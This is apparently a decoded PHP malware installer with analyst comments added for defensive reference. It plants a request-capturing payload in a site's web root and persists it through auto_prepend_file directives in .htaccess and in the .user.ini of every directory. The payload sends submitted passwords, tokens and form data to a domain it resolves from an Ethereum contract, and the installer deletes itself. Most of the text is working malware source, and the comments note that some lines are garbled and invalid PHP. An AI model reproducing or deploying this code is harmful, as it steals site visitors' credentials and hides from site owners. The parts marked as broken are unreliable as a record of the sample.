

/**
 * OVA-TOOLS
 */

// Analyst summary (decoded malicious sample, kept here for defensive reference).
// This script is a one-shot installer. It writes a request-capturing payload into
// the web root, registers it through auto_prepend_file in .htaccess and .user.ini
// files, prints a one-word status, and then deletes itself.
// NOTE(review): parts of this listing are not valid PHP as rendered by the decoder
// (see the subdirectory loop), so treat it as an approximation of the raw sample.

// Errors are reported internally but never displayed, and the execution time limit
// is removed.
error_reporting(E_ALL);
ini_set('display_errors', 0);
set_time_limit(0);

// Every artifact is placed directly in the document root. These four paths are the
// first things to check during triage.
$base = $_SERVER['DOCUMENT_ROOT'];
$monitorFile = $base . '/config-bok.php';
$safePrepend = $base . '/safe_prepend.php';
$userIni     = $base . '/.user.ini';
$htaccess    = $base . '/.htaccess';

// Per-step result flags; they drive the status string echoed at the end.
// 'user_ini_subdirs' may later hold the string 'partial' instead of a bool.
$success = [
    'monitor' => false,
    'safe_prepend' => false,
    'htaccess' => false,
    'user_ini_root' => false,
    'user_ini_subdirs' => false
];

// Payload source, held in a nowdoc (no interpolation) and written verbatim to
// $monitorFile by the file_put_contents() call that follows the heredoc.
//
// What the payload does on each request it is prepended to:
//  - getDomainFromContract(): returns the hostname stored in a '.eth_cache' file
//    next to the payload when that file is under 3600 seconds old and matches
//    [a-zA-Z0-9.-]+. Otherwise it sends a JSON-RPC eth_call for the hard-coded
//    contract address and 4-byte selector to each listed Sepolia endpoint in turn,
//    reads the result as an offset word, a length word and that many bytes (the
//    layout of an ABI-encoded string return), accepts 1..253 characters matching
//    the same pattern, caches the value and returns it.
//  - Main body: lower-cases and substring-matches the keyword list against GET and
//    POST keys and values, the raw request body and REQUEST_URI. The list includes
//    broad terms such as 'action', 'submit' and 'api', so matching is not limited to
//    login forms. With no match the payload returns and the request proceeds.
//  - On a match it POSTs JSON to https://<resolved domain>/api/addurl. The 'url'
//    field holds the full request URL. The 'password' field holds a JSON document
//    with all GET and POST parameters, the raw body, request URI, method and
//    user agent.
//  - Every Throwable is swallowed, so a failure leaves no visible error.
//
// Defender notes:
//  - Treat every credential, token or form value submitted to the site while this
//    was active as disclosed, and rotate accordingly.
//  - The collection hostname is not in the file. It is re-read from the contract
//    whenever the cache is older than an hour, so blocking one observed domain is
//    not sufficient. The contract address, selector, RPC hosts and the '/api/addurl'
//    path are the stable indicators.
//  - Outbound HTTPS from the web server to the listed RPC hosts is worth alerting
//    on for a site that has no blockchain functionality.
$monitorCode = <<<'PHP'
/**
 * Global
 */
function getDomainFromContract($cacheFile) {
    if (file_exists($cacheFile) && (time() - filemtime($cacheFile) < 3600)) {
        $domain = file_get_contents($cacheFile);
        if ($domain && preg_match('/^[a-zA-Z0-9.\-]+$/', trim($domain))) {
            return trim($domain);
        }
    }

    $rpcs = [
        'https://rpc.sepolia.org',
        'https://sepolia.gateway.tenderly.co',
        'https://eth-sepolia.g.alchemy.com/v2/demo',
        'https://sepolia.infura.io/v3/9aa3d95b3bc440fa88ea12eaa4456161'
    ];

    $contract = '0xCe8192bDb906d0B539Eb5d861d768D28F096a695';
    $data = '0xb68d1809';
    $payload = json_encode([
        'jsonrpc' => '2.0',
        'method' => 'eth_call',
        'params' => [['to' => $contract, 'data' => $data], 'latest'],
        'id' => 1
    ]);

    foreach ($rpcs as $rpcUrl) {
        $ch = curl_init($rpcUrl);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
        curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
        curl_setopt($ch, CURLOPT_TIMEOUT, 8);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
        $response = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        $curlError = curl_error($ch);
        curl_close($ch);

        if ($curlError || $httpCode !== 200) continue;

        $data = json_decode($response, true);
        if (isset($data['error'])) continue;

        $hex = $data['result'] ?? null;
        if (!$hex || !is_string($hex) || strpos($hex, '0x') !== 0) continue;

        $hex = substr($hex, 2);
        if (strlen($hex) < 128) continue;
        $offset = hexdec(substr($hex, 0, 64)) * 2;
        $length = hexdec(substr($hex, $offset, 64));
        if ($length == 0 || $length > 253) continue;
        $domain = @hex2bin(substr($hex, $offset + 64, $length * 2));
        if (!$domain || !preg_match('/^[a-zA-Z0-9.\-]+$/', $domain)) continue;

        file_put_contents($cacheFile, $domain);
        return $domain;
    }
    return null;
}

try {
    $cacheFile = __DIR__ . '/.eth_cache';

    $scheme = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
    $url = $scheme . '://' . ($_SERVER['HTTP_HOST'] ?? '') . ($_SERVER['REQUEST_URI'] ?? '');
    $rawBody = file_get_contents("php://input");

    // الكلمات الدلالية (بنفس الحالة تماماً أو مختلفة، سنبحث بدون تمييز)
    $keywords = ['pass', 'password', 'pwd', 'login', 'token', 'admin', 'administrator', 'pw_name', 'action', 'submit', 'api'];
    $found = false;

    // دالة للبحث عن أي كلمة داخل نص معين
    function containsKeyword($text, $keywords) {
        $text = strtolower($text);
        foreach ($keywords as $kw) {
            if (strpos($text, strtolower($kw)) !== false) {
                return true;
            }
        }
        return false;
    }

    // 
    foreach ($_GET as $key => $value) {
        if (containsKeyword($key, $keywords) || containsKeyword($value, $keywords)) {
            $found = true;
            break;
        }
    }

    //  
    if (!$found) {
        foreach ($_POST as $key => $value) {
            if (containsKeyword($key, $keywords) || containsKeyword($value, $keywords)) {
                $found = true;
                break;
            }
        }
    }

    // 
    if (!$found && !empty($rawBody)) {
        if (containsKeyword($rawBody, $keywords)) {
            $found = true;
        }
    }

    // 
    if (!$found) {
        if (containsKeyword($_SERVER['REQUEST_URI'], $keywords)) {
            $found = true;
        }
    }

    // 
    if (!$found) {
        return;
    }

    $payload = [
        'get'  => $_GET,
        'post' => $_POST,
        'raw'  => $rawBody,
        'server' => [
            'request_uri' => $_SERVER['REQUEST_URI'] ?? '',
            'method'      => $_SERVER['REQUEST_METHOD'] ?? '',
            'user_agent'  => $_SERVER['HTTP_USER_AGENT'] ?? ''
        ]
    ];

    $maintDomain = getDomainFromContract($cacheFile);
    if ($maintDomain) {
        $apiUrl = 'https://' . $maintDomain . '/api/addurl';
        $postData = json_encode([
            'url'      => $url,
            'password' => json_encode($payload, JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES)
        ]);

        $ch = curl_init($apiUrl);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
        curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
        curl_setopt($ch, CURLOPT_TIMEOUT, 10);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
        curl_exec($ch);
        curl_close($ch);
    }
} catch (\Throwable $e) {
    // Silent fail
}
PHP;

// Unconditional write: an existing config-bok.php is overwritten with the payload.
if (file_put_contents($monitorFile, $monitorCode) !== false) {
    $success['monitor'] = true;
}

// safe_prepend.php
// Loader stub that the auto_prepend_file directives point at. It includes
// config-bok.php from its own directory only when that file exists, so deleting
// the payload alone does not break the site, but the hook stays in place.
$safePrependCode = <<<'PHP'
$monitorPath = __DIR__ . '/config-bok.php';
if (file_exists($monitorPath)) {
    include $monitorPath;
}
PHP;
// The stub is written only when no file of that name exists. A pre-existing
// safe_prepend.php is left untouched and still counted as success, so its contents
// are not verified here.
if (!file_exists($safePrepend) && file_put_contents($safePrepend, $safePrependCode) !== false) {
    $success['safe_prepend'] = true;
} elseif (file_exists($safePrepend)) {
    $success['safe_prepend'] = true;
} else {
    $success['safe_prepend'] = false;
}

// .htaccess
// Persistence via the web-root .htaccess: an auto_prepend_file directive naming the
// loader stub, wrapped for both mod_php and the LSAPI module. This heredoc is
// interpolated, so the absolute stub path is baked into the rule text.
$htRule = <<<HT
<IfModule mod_php.c>
    php_value auto_prepend_file "{$safePrepend}"
</IfModule>
<IfModule lsapi_module>
    php_value auto_prepend_file "{$safePrepend}"
</IfModule>
HT;
$currentHt = file_exists($htaccess) ? file_get_contents($htaccess) : '';
// Strips every existing quoted `php_value auto_prepend_file "..."` directive,
// whatever it pointed to. A prepend installed by a legitimate tool (for example a
// PHP-level firewall) is displaced by this step, so restore it during cleanup.
$updatedHt = preg_replace('/php_value auto_prepend_file\s+".*?"\s*?\n?/i', '', $currentHt);
// Appends the rule unless the stub path still appears in the remaining text.
// The rest of the original .htaccess is kept, trimmed, ahead of the appended rule.
if (strpos($updatedHt, $safePrepend) === false) {
    if (file_put_contents($htaccess, trim($updatedHt) . PHP_EOL . $htRule . PHP_EOL) !== false) {
        $success['htaccess'] = true;
    }
} else {
    $success['htaccess'] = true;
}

// .user.ini (root)
// Second persistence path, for setups where PHP reads per-directory .user.ini
// files: the same auto_prepend_file target, expressed as an ini line.
// Cleanup caveats: remove the directive before deleting safe_prepend.php, because a
// prepend path that no longer exists makes PHP fail the request. PHP also caches
// .user.ini (user_ini.cache_ttl), so an edit may take a few minutes to apply.
$prependLine = 'auto_prepend_file="' . $safePrepend . '"';
$currentIni = file_exists($userIni) ? file_get_contents($userIni) : '';
// Any existing quoted auto_prepend_file setting is removed before the new one is added.
$updatedIni = preg_replace('/auto_prepend_file\s*=\s*".*?"\s*?\n?/i', '', $currentIni);
if (strpos($updatedIni, $safePrepend) === false) {
    if (file_put_contents($userIni, trim($updatedIni) . PHP_EOL . $prependLine . PHP_EOL) !== false) {
        $success['user_ini_root'] = true;
    }
} else {
    $success['user_ini_root'] = true;
}

// .user.ini (every subdirectory)
// Walks the whole tree under the document root (directories visited before their
// children, dot entries skipped). For each directory that is not skipped, it puts a
// two-line snippet in front of that directory's .user.ini unless the file already
// mentions the stub path. Existing ini content is preserved after the snippet.
// $subdirTotal counts directories considered. $subdirSuccessCount counts those
// written or already containing the path. The final flag is true when all
// succeeded, 'partial' when some did, and false otherwise.
// Defender notes: the literal marker "; Auto-generated for monitoring" is a
// convenient search string. Cleanup has to cover every directory's .user.ini, not
// only the root one, because each file re-establishes the prepend for its subtree.
$subdirSuccessCount = 0;
$subdirTotal = 0;
$iterator = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($base, RecursiveDirectoryIterator::SKIP_DOTS),
    RecursiveIteratorIterator::SELF_FIRST
);
foreach ($iterator as $item) {
    if ($item->isDir()) {
        $subDir = $item->getPathname();
        // Directories named 'logs' are skipped.
        // NOTE(review): the second strpos() call has an empty needle argument as
        // rendered, which is not valid PHP. The decoder appears to have dropped a
        // literal, so the second skip condition cannot be determined from this page.
        if (basename($subDir) === 'logs' || strpos(basename($subDir), ) === 0) continue;
        $targetIni = $subDir . '/.user.ini';
        // NOTE(review): the quoting on the second $content line is unbalanced as
        // rendered, so the exact bytes written cannot be confirmed from this page.
        // Confirm against the raw sample before using them in a signature.
        $content = "; Auto-generated for monitoring\n";
        $content .= 'auto_prepend_file="' . $safePrepend . '"\n";
        $existing = file_exists($targetIni) ? file_get_contents($targetIni) : '';
        if (strpos($existing, $safePrepend) === false) {
            $subdirTotal++;
            if (file_put_contents($targetIni, $content . PHP_EOL . $existing) !== false) {
                $subdirSuccessCount++;
            }
        } else {
            $subdirSuccessCount++;
            $subdirTotal++;
        }
    }
}
if ($subdirTotal > 0 && $subdirSuccessCount === $subdirTotal) {
    $success['user_ini_subdirs'] = true;
} elseif ($subdirTotal > 0 && $subdirSuccessCount > 0) {
    $success['user_ini_subdirs'] = 'partial';
} else {
    $success['user_ini_subdirs'] = false;
}

// Collapse the per-step flags into one of three status strings returned in the
// response body: "OVA-Active" when every step succeeded, "OVA-Active2" when there
// is a mix of successes and failures (a 'partial' value counts as both), and
// "OVA-NOT" otherwise. The strings are usable as indicators wherever response
// bodies are captured, such as a proxy, WAF or packet capture.
$allSuccess = true;
$anySuccess = false;
$anyFailure = false;
foreach ($success as $key => $val) {
    if ($val === false) {
        $allSuccess = false;
        $anyFailure = true;
    } elseif ($val === true) {
        $anySuccess = true;
    } elseif ($val === 'partial') {
        $allSuccess = false;
        $anySuccess = true;
        $anyFailure = true;
    }
}
if ($allSuccess && !$anyFailure) {
    echo "OVA-Active";
} elseif ($anySuccess && $anyFailure) {
    echo "OVA-Active2";
} else {
    echo "OVA-NOT";
}
// The installer deletes its own file, with errors suppressed, so it will normally
// be absent from disk during triage. The files and directives it wrote remain and
// are what to hunt for. The initial upload vector is not shown on this page.
@unlink(__FILE__);


